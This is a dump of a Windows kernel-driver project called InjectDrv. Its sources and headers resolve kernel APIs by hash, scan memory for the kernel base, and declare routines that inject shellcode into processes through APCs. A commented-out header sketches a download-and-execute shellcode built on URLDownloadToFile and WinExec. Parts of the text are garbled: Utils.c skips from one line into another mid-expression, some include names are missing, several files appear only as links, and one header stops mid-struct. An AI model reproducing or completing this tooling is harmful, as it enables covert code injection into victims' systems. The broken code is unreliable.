├── ShellCode.c
├── x86Call.c
├── .gitattributes
├── InjectDrv.suo
├── InjectDrv.v11.suo
├── InjectDrv.vcproj
├── x64Call.h
├── sources
├── makefile
├── .gitignore
├── InjectDrv.c
├── x86Call.h
├── xDrvCall.Asm
├── InjectDrv.sln
├── Utils.h
├── x64Call.c
├── InjectDrv.vcproj.Seh_Cracker-PC.Seh_Cracker.user
├── ShellCode.h
├── InitializeInjectRelevantInfo.h
├── Utils.c
├── DrvCfg.h
├── InitializeInjectRelevantInfo.c
└── KernelApi.h
/ShellCode.c:
--------------------------------------------------------------------------------
1 | #include "DrvCfg.h"
2 | #include "ShellCode.h"
3 |
4 |
--------------------------------------------------------------------------------
/x86Call.c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DeviceObject/InjectDrv/HEAD/x86Call.c
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
--------------------------------------------------------------------------------
/InjectDrv.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DeviceObject/InjectDrv/HEAD/InjectDrv.suo
--------------------------------------------------------------------------------
/InjectDrv.v11.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DeviceObject/InjectDrv/HEAD/InjectDrv.v11.suo
--------------------------------------------------------------------------------
/InjectDrv.vcproj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DeviceObject/InjectDrv/HEAD/InjectDrv.vcproj
--------------------------------------------------------------------------------
/x64Call.h:
--------------------------------------------------------------------------------
1 | #ifndef __X64_CALL_H__
2 | #define __X64_CALL_H__
3 |
4 | PVOID x64GetNtoskrnlBase();
5 | #ifdef _WIN64
6 | extern ULONG x64_Check_Address(PVOID VirtualAddress);
7 | #endif
8 | #endif
--------------------------------------------------------------------------------
/sources:
--------------------------------------------------------------------------------
1 | TARGETNAME=InjectDrvx64
2 | TARGETPATH=./Bin
3 | TARGETTYPE=DRIVER
4 | TARGETLIBS=xDrvCall.lib
5 | BUFFER_OVERFLOW_CHECKS=0
6 | C_DEFINES=$(C_DEFINES) /Gz
7 |
8 | !IF $(FREEBUILD)
9 | MSC_OPTIMIZATION = /O1 /Oi /GS-
10 | MSC_STDCALL = 1
11 | MSC_WARNING_LEVEL=/W3 /WX
12 | !ENDIF
13 |
14 | SOURCES=InjectDrv.c \
15 | Utils.c \
16 | x86Call.c \
17 |
18 |
--------------------------------------------------------------------------------
/makefile:
--------------------------------------------------------------------------------
1 | !IF 0
2 |
3 | Copyright (C) Microsoft Corporation, 1999 - 2002
4 |
5 | Module Name:
6 |
7 | makefile.
8 |
9 | Notes:
10 |
11 | DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source
12 | file to this component. This file merely indirects to the real make file
13 | that is shared by all the components of Windows NT (DDK)
14 |
15 | !ENDIF
16 |
17 | !INCLUDE $(NTMAKEENV)\makefile.def
18 |
19 | MSC_WARNING_LEVEL=/W1
20 |
21 |
22 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # Prerequisites
2 | *.d
3 |
4 | # Object files
5 | *.o
6 | *.ko
7 | *.obj
8 | *.elf
9 |
10 | # Linker output
11 | *.ilk
12 | *.map
13 | *.exp
14 |
15 | # Precompiled Headers
16 | *.gch
17 | *.pch
18 |
19 | # Libraries
20 | *.lib
21 | *.a
22 | *.la
23 | *.lo
24 |
25 | # Shared objects (inc. Windows DLLs)
26 | *.dll
27 | *.so
28 | *.so.*
29 | *.dylib
30 |
31 | # Executables
32 | *.exe
33 | *.out
34 | *.app
35 | *.i*86
36 | *.x86_64
37 | *.hex
38 |
39 | # Debug files
40 | *.dSYM/
41 | *.su
42 | *.idb
43 | *.pdb
44 |
45 | # Kernel Module Compile Results
46 | *.mod*
47 | *.cmd
48 | modules.order
49 | Module.symvers
50 | Mkfile.old
51 | dkms.conf
52 |
--------------------------------------------------------------------------------
/InjectDrv.c:
--------------------------------------------------------------------------------
1 | #include "DrvCfg.h"
2 | #include "x86Call.h"
3 | #include "x64Call.h"
4 |
5 | extern void x64_Call_Loader(EXALLOCATEPOOLWITHTAG MyExAllocatePoolWithTag,PUCHAR pBaseAddr);
6 | extern void x64_Call_Work();
7 |
8 | NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject,PUNICODE_STRING pUniRegister)
9 | {
10 | NTSTATUS Status;
11 |
12 | UNREFERENCED_PARAMETER(pDriverObject);
13 | UNREFERENCED_PARAMETER(pUniRegister);
14 | #ifndef _WIN64
15 | //x86_Call_Initialize(ExAllocatePoolWithTag,pDriverObject->DriverStart);
16 | //x86_Call_Work();
17 | InitializeFunctionDat(g_pFunctionDat);
18 | #else
19 | //x64_Call_Loader(NULL,NULL);
20 | //x64_Call_Work();
21 | //x64GetNtoskrnlBase();
22 |
23 | //DbgPrint(pShow);
24 | //InitializeFunctionDat(g_pFunctionDat);
25 |
26 | Get_Kernel_Api_From_HashValue((PVOID)GetModuleBaseAddress(NULL));
27 |
28 | #endif
29 | Status = STATUS_SUCCESS;
30 | return Status;
31 | }
--------------------------------------------------------------------------------
/x86Call.h:
--------------------------------------------------------------------------------
1 | #ifndef __X86_CALL_H__
2 | #define __X86_CALL_H__
3 |
4 | void InitializeFunctionDat(PFUNCTION_DAT pFunctionDat);
5 | void x86_Call_Initialize(EXALLOCATEPOOLWITHTAG MyExAllocatePoolWithTag,PUCHAR pBaseAddr);
6 | void x86_Call_Work();
7 | ULONG Initialize_Reload(EXALLOCATEPOOLWITHTAG MyExAllocatePoolWithTag,PUCHAR pBaseAddr);
8 | void Sti();
9 | void Cli();
10 | ULONG_PTR ReadCr4();
11 | ULONG_PTR *x86GetNtoskrnlBase();
12 | BOOLEAN SubEntry(PVOID pNtoskrnlBase,EXALLOCATEPOOLWITHTAG MyExAllocatePoolWithTag);
13 | PVOID GetModuleBaseAddress(PCHAR pModuleName);
14 | ULONG_PTR Get_Kernel_Api_From_HashValue(PVOID pImageBase);
15 | PVOID AllocateMemoryFromTargetProcess(PVOID pEProcess);
16 | BOOLEAN InjectProcess(HANDLE hProcessId);
17 | BOOLEAN InsertApc(PVOID pShellCode,PKAPC pApc);
18 | VOID InjectNotifyRoutine(PUNICODE_STRING FullImageName,HANDLE ProcessId,PIMAGE_INFO ImageInfo);
19 |
20 | //VOID SystemSleep(LONGLONG sec);
21 | //VOID SystemReboot();
22 | //LONG MyGetCurrentTime();
23 |
24 | #endif
--------------------------------------------------------------------------------
/xDrvCall.Asm:
--------------------------------------------------------------------------------
1 |
2 | extern Initialize_Reload:proc
3 | extern SubEntry:proc
4 |
5 | _TEXT segment
6 |
7 | FasterCodeAlignement EQU 10h
8 |
9 | ALIGN FasterCodeAlignement
10 |
11 | x64_Check_Address proc
12 |
13 | and rcx,0FFFFFFFFFFFFF000h
14 | mov rdx,0FFFFF6FB7DBED000h
15 | mov rax,rcx
16 | shr rax,24h
17 | and eax,0FF8h
18 | test byte ptr [rax + rdx],1
19 | jnz IsValidAddress
20 | x64_Check_Address_Return:
21 | xor eax,eax
22 | ret
23 | IsValidAddress:
24 | mov rax,rcx
25 | mov rdx,0FFFFF6FB7DA00000h
26 | shr rax,1Bh
27 | and eax,1FFFF8h
28 | test byte ptr [rax + rdx],1
29 | jz x64_Check_Address_Return
30 | mov rax,rcx
31 | mov rdx,0FFFFF6FB40000000h
32 | shr rax,12h
33 | and eax,3FFFFFF8h
34 | mov rdx,[rax + rdx]
35 | test dl,1
36 | jz x64_Check_Address_Return
37 | and dl,81h
38 | cmp dl,81h
39 | jz x64_Check_Address_Return
40 | mov rax,7FFFFFFFF8h
41 | shr rcx,9
42 | mov rdx,0FFFFF68000000000h
43 | and rcx,rdx
44 | movzx eax,byte ptr [rcx + rdx]
45 | and eax,1
46 | ret
47 | x64_Check_Address endp
48 |
49 | x64_Call_Loader proc
50 | mov eax,40404040h
51 | jmp Initialize_Reload
52 | x64_Call_Loader endp
53 |
54 | x64_Call_Work proc
55 | nop
56 | nop
57 | mov eax,80808080h
58 | jmp SubEntry
59 | x64_Call_Work endp
60 |
61 | _TEXT ends
62 |
63 | end
--------------------------------------------------------------------------------
/InjectDrv.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 10.00
3 | # Visual Studio 2008
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InjectDrv", "InjectDrv.vcproj", "{2F016A3A-0C8F-404B-B558-0C5722064C4C}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {2F016A3A-0C8F-404B-B558-0C5722064C4C}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {2F016A3A-0C8F-404B-B558-0C5722064C4C}.Debug|Win32.Build.0 = Debug|Win32
16 | {2F016A3A-0C8F-404B-B558-0C5722064C4C}.Debug|x64.ActiveCfg = Debug|x64
17 | {2F016A3A-0C8F-404B-B558-0C5722064C4C}.Debug|x64.Build.0 = Debug|x64
18 | {2F016A3A-0C8F-404B-B558-0C5722064C4C}.Release|Win32.ActiveCfg = Release|Win32
19 | {2F016A3A-0C8F-404B-B558-0C5722064C4C}.Release|Win32.Build.0 = Release|Win32
20 | {2F016A3A-0C8F-404B-B558-0C5722064C4C}.Release|x64.ActiveCfg = Release|x64
21 | {2F016A3A-0C8F-404B-B558-0C5722064C4C}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/Utils.h:
--------------------------------------------------------------------------------
1 | #ifndef __UTILS_H__
2 | #define __UTILS_H__
3 |
4 | #ifndef _WIN64
5 | void __stdcall CleanZero(PUCHAR pCleanBuffer,ULONG ulLength);
6 | #else
7 | void __fastcall CleanZero(PUCHAR pCleanBuffer,ULONG ulLength);
8 | #endif
9 |
10 | #ifndef _WIN64
11 | PCHAR __stdcall MyMemcpy(PCHAR pDst,PCHAR pSrc,ULONG ulLength);
12 | #else
13 | PCHAR __fastcall MyMemcpy(PCHAR pDst,PCHAR pSrc,ULONG ulLength);
14 | #endif
15 |
16 | #ifndef _WIN64
17 | ULONG __stdcall CalcHashValue(char *szApiName);
18 | #else
19 | ULONG __fastcall CalcHashValue(char *szApiName);
20 | #endif
21 |
22 | #ifndef _WIN64
23 | int __stdcall My_memicmp(char *src,char *dest,int size);
24 | #else
25 | int __fastcall My_memicmp(char *src,char *dest,int size);
26 | #endif
27 |
28 | #ifndef _WIN64
29 | char *__stdcall My_stristr(char *src,char *dest);
30 | #else
31 | char *__fastcall My_stristr(char *src,char *dest);
32 | #endif
33 |
34 | #ifndef _WIN64
35 | int __stdcall my_strlen(char *str);
36 | #else
37 | int __fastcall my_strlen(char *str);
38 | #endif
39 |
40 | #ifndef _WIN64
41 | int __stdcall my_strcmp(char *src,char *dest);
42 | #else
43 | int __fastcall my_strcmp(char *src,char *dest);
44 | #endif
45 |
46 | #ifndef _WIN64
47 | PCHAR __stdcall MyStrLower(PCHAR pSrc);
48 | #else
49 | PCHAR __fastcall MyStrLower(PCHAR pSrc);
50 | #endif
51 |
52 | #endif
--------------------------------------------------------------------------------
/x64Call.c:
--------------------------------------------------------------------------------
1 | #include "DrvCfg.h"
2 | #include "Utils.h"
3 | #include "x64Call.h"
4 |
5 | //BOOLEAN MyIsAddressValid(PVOID VirtualAddress)
6 | //{
7 | // if (((ULONG_PTR)((ULONG)((VirtualAddress & 0xFFFFFFFFFFFFF000) >> 0x24) & 0xFF8) + 0xFFFFF6FB7DBED000) & 1 == 0)
8 | // {
9 | // return FALSE;
10 | // }
11 | // if (((ULONG_PTR)(((ULONG)(VirtualAddress >> 0x1B)) & 0x1FFFF8) + 0xFFFFF6FB7DA00000) & 1 == 0)
12 | // {
13 | // return FALSE;
14 | // }
15 | // if ((*(char*)((((ULONG)(VirtualAddress >> 0x12)) & 0x3FFFFFF8) + 0xFFFFF6FB40000000)) & 1 == 0)
16 | // {
17 | // return FALSE;
18 | // }
19 | //}
20 | #ifdef _WIN64
21 |
22 | PVOID x64GetNtoskrnlBase()
23 | {
24 | ULONG_PTR *ulStartSearchAddress;
25 | PIMAGE_DOS_HEADER pDosHeader;
26 | PIMAGE_NT_HEADERS pNtHeader;
27 | PIMAGE_EXPORT_DIRECTORY pEat;
28 |
29 | ulStartSearchAddress = (ULONG_PTR *)0xFFFFF80000000000;
30 | do
31 | {
32 | if (x64_Check_Address((PVOID)ulStartSearchAddress) != 0)
33 | {
34 | pDosHeader = (PIMAGE_DOS_HEADER)ulStartSearchAddress;
35 | if (pDosHeader->e_magic == IMAGE_DOS_SIGNATURE)
36 | {
37 | pNtHeader = (PIMAGE_NT_HEADERS)((ULONG_PTR)pDosHeader + pDosHeader->e_lfanew);
38 | if (pNtHeader->Signature == IMAGE_NT_SIGNATURE)
39 | {
40 | if (pNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress != 0 && \
41 | pNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size != 0)
42 | {
43 | pEat = (PIMAGE_EXPORT_DIRECTORY)((ULONG_PTR)pDosHeader + pNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
44 | if (pEat->NumberOfFunctions > 0x320)
45 | {
46 | return (PVOID)ulStartSearchAddress;
47 | }
48 | }
49 | }
50 | }
51 | }
52 | ulStartSearchAddress += 0x1000;
53 | } while ((ULONG_PTR)ulStartSearchAddress < 0xFFFFF90000000000);
54 | return NULL;
55 | }
56 |
57 | #endif
--------------------------------------------------------------------------------
/InjectDrv.vcproj.Seh_Cracker-PC.Seh_Cracker.user:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
11 |
35 |
36 |
39 |
63 |
64 |
67 |
91 |
92 |
95 |
119 |
120 |
121 |
122 |
--------------------------------------------------------------------------------
/ShellCode.h:
--------------------------------------------------------------------------------
1 | #ifndef __SHELL_CODE_H__
2 | #define __SHELL_CODE_H__
3 |
4 | /*
5 | #ifndef _WIN64
6 |
7 | typedef HANDLE (__stdcall *CREATEFILE)(LPCTSTR lpFileName, \
8 | DWORD dwDesiredAccess, \
9 | DWORD dwShareMode, \
10 | LPSECURITY_ATTRIBUTES lpSecurityAttributes, \
11 | DWORD dwCreationDisposition, \
12 | DWORD dwFlagsAndAttributes, \
13 | HANDLE hTemplateFile);
14 | typedef BOOL (__stdcall *WRITEFILE)(HANDLE hFile, \
15 | LPCVOID lpBuffer, \
16 | DWORD nNumberOfBytesToWrite, \
17 | LPDWORD lpNumberOfBytesWritten, \
18 | LPOVERLAPPED lpOverlapped);
19 | typedef HRESULT (__stdcall *CLOSEHANDLE)(HANDLE hHandle);
20 | typedef BOOL (__stdcall *SHELLEXECUTEEX)(SHELLEXECUTEINFO *pExecInfo);
21 | typedef UINT (__stdcall *WINEXEC)(LPCSTR lpCmdLine,UINT uCmdShow);
22 | typedef HRESULT (__stdcall *URLDOWNLOADTOFILE)(LPUNKNOWN pCaller, \
23 | LPCTSTR szURL, \
24 | LPCTSTR szFileName, \
25 | DWORD dwReserved, \
26 | LPBINDSTATUSCALLBACK lpfnCB);
27 | typedef DWORD (__stdcall *GETTEMPPATH)(DWORD nBufferLength,LPTSTR lpBuffer);
28 |
29 | #else
30 |
31 | typedef HANDLE (__fastcall *CREATEFILE)(LPCTSTR lpFileName, \
32 | DWORD dwDesiredAccess, \
33 | DWORD dwShareMode, \
34 | LPSECURITY_ATTRIBUTES lpSecurityAttributes, \
35 | DWORD dwCreationDisposition, \
36 | DWORD dwFlagsAndAttributes, \
37 | HANDLE hTemplateFile);
38 | typedef BOOL (__fastcall *WRITEFILE)(HANDLE hFile, \
39 | LPCVOID lpBuffer, \
40 | DWORD nNumberOfBytesToWrite, \
41 | LPDWORD lpNumberOfBytesWritten, \
42 | LPOVERLAPPED lpOverlapped);
43 | typedef HRESULT (__fastcall *CLOSEHANDLE)(HANDLE hHandle);
44 | typedef BOOL (__fastcall *SHELLEXECUTEEX)(SHELLEXECUTEINFO *pExecInfo);
45 | typedef UINT (__fastcall *WINEXEC)(LPCSTR lpCmdLine,UINT uCmdShow);
46 | typedef HRESULT (__fastcall *URLDOWNLOADTOFILE)(LPUNKNOWN pCaller, \
47 | LPCTSTR szURL, \
48 | LPCTSTR szFileName, \
49 | DWORD dwReserved, \
50 | LPBINDSTATUSCALLBACK lpfnCB);
51 | typedef DWORD (__fastcall *GETTEMPPATH)(DWORD nBufferLength,LPTSTR lpBuffer);
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 | #endif
60 |
61 |
62 | typedef struct _SHELL_CODE_IMPORT_KERNEL32
63 | {
64 | WCHAR wKernel32[] = {'k','e','r','n','e','l','3','2','.','d','l','l',L'\0'};
65 | CREATEFILE ShellCodeCreateFile;
66 | WRITEFILE ShellCodeWriteFile;
67 | CLOSEHANDLE ShellCodeCloseHandle;
68 | WINEXEC ShellCodeWinExec;
69 | GETTEMPPATH ShellCodeGetTempPath;
70 |
71 | }SHELL_CODE_IMPORT_KERNEL32,*PSHELL_CODE_IMPORT_KERNEL32;
72 |
73 | typedef struct _SHELL_CODE_IMPORT_URLMON
74 | {
75 | WCHAR wUrlMon[] = {'u','r','l','m','o','n','.','d','l','l',L'\0'};
76 | URLDOWNLOADTOFILE ShellCodeUrlDownloadToFile;
77 | }SHELL_CODE_IMPORT_URLMON,*PSHELL_CODE_IMPORT_URLMON;
78 |
79 | typedef struct _SHELL_CODE_PARAM
80 | {
81 | ULONG ulShellCodeLength;
82 | PVOID pShellCodeStartAddress;
83 | SHELL_CODE_IMPORT_KERNEL32 ShellCodeImportKernel32;
84 | SHELL_CODE_IMPORT_URLMON ShellCodeImportUrlMon;
85 | WCHAR wUrl[MAX_PATH];
86 | }SHELL_CODE_PARAM,*PSHELL_CODE_PARAM;
87 | */
88 | #endif
--------------------------------------------------------------------------------
/InitializeInjectRelevantInfo.h:
--------------------------------------------------------------------------------
1 | #ifndef __INITIALIZE_INJECT_RELEVANT_INFO__
2 | #define __INITIALIZE_INJECT_RELEVANT_INFO__
3 |
4 | #define DELAY_ONE_MICROSECOND (-10)
5 | #define DELAY_ONE_MILLISECOND (DELAY_ONE_MICROSECOND*1000)
6 | #define DELAY_ONE_SECOND (DELAY_ONE_MILLISECOND*1000)
7 |
8 | #ifndef POWER_FAILURE_SIMULATE
9 | #define POWER_FAILURE_SIMULATE 0x000000E5
10 | #endif
11 |
12 |
13 | typedef struct _INJECT_THREAD
14 | {
15 | LIST_ENTRY NextThread;
16 |
17 | }INJECT_THREAD,*PINJECT_THREAD;
18 |
19 | typedef struct _INJECT_PROCESS
20 | {
21 | LIST_ENTRY NextProcess;
22 |
23 | }INJECT_PROCESS,*PINJECT_PROCESS;
24 |
25 | typedef struct _INJECT_TARGET_INFO
26 | {
27 | HANDLE hInjectPid;
28 | ULONG ulHashValue;
29 | PVOID pEThread;
30 | }INJECT_TARGET_INFO,*PINJECT_TARGET_INFO;
31 | typedef struct _SYSTEM_VERSION
32 | {
33 | ULONG ulMajorVersion;
34 | ULONG ulMinorVersion;
35 | ULONG ulBuildNumber;
36 | PUNICODE_STRING unStrCSDVersion;
37 | }SYSTEM_VERSION,*PSYSTEM_VERSION;
38 | typedef struct _WINDOWS_VERSION
39 | {
40 | #ifndef _WIN64
41 | ULONG_PTR ulReserved:20;
42 | #else
43 | ULONG_PTR ulReserved:52;
44 | #endif
45 | ULONG_PTR bIsUnknow:1;
46 | ULONG_PTR bIsWindows2000:1;
47 | ULONG_PTR bIsWindowsXp:1;
48 | ULONG_PTR bIsWindows2003:1;
49 | ULONG_PTR bIsWindowsVista:1;
50 | ULONG_PTR bIsWindows7:1;
51 | ULONG_PTR bIsWindows2008:1;
52 | ULONG_PTR bIsWindows8:1;
53 | ULONG_PTR bIsWindows81:1;
54 | ULONG_PTR bIsWindows10:1;
55 | ULONG_PTR bIsWindows2012:1;
56 | ULONG_PTR bIs64Bit:1;
57 | }WINDOWS_VERSION,*PWINDOWS_VERSION;
58 | typedef struct _INJECT_RELEVANT_OFFSET
59 | {
60 | //Process
61 | ULONG_PTR ulOffsetPeb;
62 | ULONG_PTR ulOffsetName;
63 | ULONG_PTR ulOffsetFlink;
64 | ULONG_PTR ulOffsetResv;
65 | ULONG_PTR ulOffsetThreadListHead;
66 | ULONG_PTR ulOffsetPid;
67 |
68 | //Thread
69 | ULONG_PTR ulOffsetThreadListEntry;
70 | ULONG_PTR ulOffsetSuspendCount;
71 | ULONG_PTR ulOffsetCrossThreadFlags;
72 | ULONG_PTR ulOffsetCid;
73 | ULONG_PTR ulOffsetTrapFrame;
74 | ULONG_PTR ulOffsetTeb;
75 | ULONG_PTR ulOffsetAlerted;
76 | ULONG_PTR ulOffsetAlertable;
77 | ULONG_PTR ulOffsetApcState;
78 |
79 | //PEB
80 | ULONG_PTR ulOffsetPebLdr;
81 | ULONG_PTR ulOffsetPebModuleListEntry;
82 |
83 | //Teb
84 | ULONG_PTR ulOffsetActivationContextStackPointer;
85 |
86 | WINDOWS_VERSION WindowsVersion;
87 | }INJECT_RELEVANT_OFFSET,*PINJECT_RELEVANT_OFFSET;
88 |
89 | extern INJECT_RELEVANT_OFFSET g_InjectRelevantOffset;
90 |
91 | NTSTATUS IsWindows64Bits(PVOID pCurProcess);
92 | BOOLEAN InitializeWindows2k(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset);
93 | BOOLEAN InitializeWindowsXp(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset);
94 | BOOLEAN InitializeWindows2003(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset);
95 | NTSTATUS InitializeWindows7(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset);
96 | NTSTATUS InitializeWindows8(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset);
97 | NTSTATUS InitializeWindows8_1(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset);
98 | NTSTATUS InitializeWindows10(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset);
99 | BOOLEAN InitializeInjectInformation(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset);
100 |
101 |
102 | #endif
103 |
--------------------------------------------------------------------------------
/Utils.c:
--------------------------------------------------------------------------------
1 | #include "DrvCfg.h"
2 | #include "Utils.h"
3 |
4 | #ifndef _WIN64
5 | void __stdcall CleanZero(PUCHAR pCleanBuffer,ULONG ulLength)
6 | #else
7 | void __fastcall CleanZero(PUCHAR pCleanBuffer,ULONG ulLength)
8 | #endif
9 | {
10 | ULONG ulCnt;
11 |
12 | ulCnt = 0;
13 |
14 | while (ulCnt < ulLength)
15 | {
16 | if (*(pCleanBuffer + ulCnt) != 0)
17 | {
18 | *(pCleanBuffer + ulCnt) = 0;
19 | }
20 | ulCnt++;
21 | }
22 | }
23 | #ifndef _WIN64
24 | PCHAR __stdcall MyMemcpy(PCHAR pDst,PCHAR pSrc,ULONG ulLength)
25 | #else
26 | PCHAR __fastcall MyMemcpy(PCHAR pDst,PCHAR pSrc,ULONG ulLength)
27 | #endif
28 | {
29 | ULONG ulCnt;
30 |
31 | ulCnt = 0;
32 | while (ulCnt < ulLength)
33 | {
34 | *pDst++ = *pSrc++;
35 | ulCnt++;
36 | }
37 | return pDst;
38 | }
39 | #ifndef _WIN64
40 | ULONG __stdcall CalcHashValue(char *szApiName)
41 | #else
42 | ULONG __fastcall CalcHashValue(char *szApiName)
43 | #endif
44 | {
45 | USHORT ulHashValue;
46 | ULONG ulTmp,ulOrValue;
47 | int i;
48 | CHAR szTmp;
49 |
50 | ulHashValue = 1;
51 | ulOrValue = 0;
52 |
53 | for (i = 0;i < my_strlen(szApiName);i++)
54 | {
55 | szTmp = szApiName[i];
56 | ulHashValue += szTmp;
57 | ulOrValue += ulHashValue;
58 | }
59 | ulTmp = ulOrValue << 0x10;
60 | ulTmp |= ulHashValue;
61 | return ulTmp;
62 | }
63 | #ifndef _WIN64
64 | int __stdcall My_memicmp(char *src,char *dest,int size)
65 | #else
66 | int __fastcall My_memicmp(char *src,char *dest,int size)
67 | #endif
68 | {
69 | char *src_tmp = src;
70 | char *dest_tmp = dest;
71 | while(size--)
72 | {
73 | if((*src_tmp==*dest_tmp)||
74 | (((*src_tmp)-'A'+'a')==*dest_tmp)
75 | ||*src_tmp==((*dest_tmp)-'A'+'a'))
76 | {
77 | src_tmp++;
78 | dest_tmp++;
79 | continue;
80 | }
81 | return -1;
82 | }
83 | return 0;
84 | }
85 | #ifndef _WIN64
86 | char *__stdcall My_stristr(char *src,char *dest)
87 | #else
88 | char *__fastcall My_stristr(char *src,char *dest)
89 | #endif
90 | {
91 | int x_len;
92 | int i;
93 | int ret;
94 | char *src_tmp = src;
95 | char *dest_tmp = dest;
96 | x_len=my_strlen(dest_tmp);
97 | i=my_strlen(src_tmp);
98 |
99 | if(i= 'A' && *pTmp <= 'Z')
152 | {
153 | *pTmp = *pTmp - 0x20;
154 | }
155 | }
156 | return pSrc;
157 | }
--------------------------------------------------------------------------------
/DrvCfg.h:
--------------------------------------------------------------------------------
1 | #ifndef __DRV_CFG_H__
2 | #define __DRV_CFG_H__
3 |
4 | #include
5 | #include
6 | #include "KernelApi.h"
7 | #include
8 | #include
9 |
10 | #define MAX_THREAD_COUNT 64
11 |
12 | #define MAKEWORD(a, b) ((USHORT)(((BYTE)(((ULONG_PTR)(a)) & 0xff)) | ((USHORT)((BYTE)(((ULONG_PTR)(b)) & 0xff))) << 8))
13 | #define MAKELONG(a, b) ((LONG)(((USHORT)(((ULONG_PTR)(a)) & 0xffff)) | ((ULONG)((USHORT)(((ULONG_PTR)(b)) & 0xffff))) << 16))
14 | #define LOWORD(l) ((USHORT)(((ULONG_PTR)(l)) & 0xffff))
15 | #define HIWORD(l) ((USHORT)((((ULONG_PTR)(l)) >> 16) & 0xffff))
16 | #define LOBYTE(w) ((BYTE)(((ULONG_PTR)(w)) & 0xff))
17 | #define HIBYTE(w) ((BYTE)((((ULONG_PTR)(w)) >> 8) & 0xff))
18 |
19 | #pragma pack(1)
20 | typedef struct _IMAGE_RELOC
21 | {
22 | USHORT Offset:12;
23 | USHORT Type:4;
24 | }IMAGE_RELOC,*PIMAGE_RELOC;
25 | typedef struct _FUNCTION_DAT
26 | {
27 | PSSETLOADIMAGENOTIFYROUTINE My_PsSetLoadImageNotifyRoutine;
28 | ULONG My_PsSetLoadImageNotifyRoutine_HashValue;
29 |
30 | //ULONG_PTR My_ZwCreateFile;
31 | //ULONG My_ZwCreateFile_HashValue;
32 |
33 | //ULONG_PTR My_ZwWriteFile;
34 | //ULONG My_ZwWriteFile_HashValue;
35 | PSSETCREATEPROCESSNOTIFYROUTINE My_PsSetCreateProcessNotifyRoutine;
36 | ULONG My_PsSetCreateProcessNotifyRoutine_HashValue;
37 |
38 | ZWCLOSE My_ZwClose;
39 | ULONG My_ZwClose_HashValue;
40 |
41 | ZWQUERYSYSTEMINFORMATION My_ZwQuerySystemInformation;
42 | ULONG My_ZwQuerySystemInformation_HashValue;
43 |
44 | EXALLOCATEPOOLWITHTAG My_ExAllocatePoolWithTag;
45 | ULONG My_ExAllocatePoolWithTag_HashValue;
46 |
47 | EXFREEPOOLWITHTAG My_ExFreePoolWithTag;
48 | ULONG My_ExFreePoolWithTag_HashValue;
49 |
50 | OBREFERENCEOBJECTBYHANDLE My_ObReferenceObjectByHandle;
51 | ULONG My_ObReferenceObjectByHandle_HashValue;
52 |
53 | OBDEREFERENCEOBJECT My_ObDereferenceObject;
54 | ULONG My_ObDereferenceObject_HashValue;
55 |
56 | PSCREATESYSTEMTHREAD My_PsCreateSystemThread;
57 | ULONG My_PsCreateSystemThread_HashValue;
58 |
59 | KEWAITFORSINGLEOBJECT My_KeWaitForSingleObject;
60 | ULONG My_KeWaitForSingleObject_HashValue;
61 |
62 | PSTERMINATESYSTEMTHREAD My_PsTerminateSystemThread;
63 | ULONG My_PsTerminateSystemThread_HashValue;
64 |
65 | MMCREATEMDL My_MmCreateMdl;
66 | ULONG My_MmCreateMdl_HashValue;
67 |
68 | MMBUILDMDLFORNONPAGEDPOOL My_MmBuildMdlForNonPagedPool;
69 | ULONG My_MmBuildMdlForNonPagedPool_HashValue;
70 |
71 | MMMAPLOCKEDPAGES My_MmMapLockedPages;
72 | ULONG My_MmMapLockedPages_HashValue;
73 |
74 | MMUNMAPLOCKEDPAGES My_MmUnmapLockedPages;
75 | ULONG My_MmUnmapLockedPages_HashValue;
76 |
77 | PSGETCURRENTPROCESS My_PsGetCurrentProcess;
78 | ULONG My_PsGetCurrentProcess_HashValue;
79 |
80 | IOGETCURRENTPROCESS My_IoGetCurrentProcess;
81 | ULONG My_IoGetCurrentProcess_HashValue;
82 |
83 | KESTACKATTACHPROCESS My_KeStackAttachProcess;
84 | ULONG My_KeStackAttachProcess_HashValue;
85 |
86 | ZWALLOCATEVIRTUALMEMORY My_ZwAllocateVirtualMemory;
87 | ULONG My_ZwAllocateVirtualMemory_HashValue;
88 |
89 | KEUNSTACKDETACHPROCESS My_KeUnstackDetachProcess;
90 | ULONG My_KeUnstackDetachProcess_HashValue;
91 |
92 | PSLOOKUPPROCESSBYPROCESSID My_PsLookupProcessByProcessId;
93 | ULONG My_PsLookupProcessByProcessId_HashValue;
94 |
95 | KEINITIALIZEAPC My_KeInitializeApc;
